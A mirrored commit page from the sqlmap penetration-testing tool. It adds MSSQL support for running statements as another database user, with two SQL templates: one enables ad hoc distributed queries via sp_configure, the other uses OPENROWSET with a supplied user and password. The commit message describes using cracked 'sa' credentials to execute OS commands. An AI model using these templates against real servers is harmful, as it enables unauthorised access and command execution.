PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-21 06:59:02 +00:00
Code Issues Projects Releases Wiki Activity

initial support for --dbms-cred for MSSQL: can be used to execute OS commands as another DB use - useful if you have retrieved and cracked the 'sa' DBA password by any mean and can provide it to sqlmap

Browse Source
This commit is contained in:
Bernardo Damele
2012-07-02 02:04:19 +01:00
parent 87951bcff8
commit 6697927098
6 changed files with 62 additions and 5 deletions
Download Patch File Download Diff File Expand all files Collapse all files

6
procs/mssqlserver/configure_openrowset.txt Normal file
View File

@@ -0,0 +1,6 @@
EXEC master..sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE WITH OVERRIDE;

1
procs/mssqlserver/run_statement_as_user.txt Normal file
View File

@@ -0,0 +1 @@
SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%');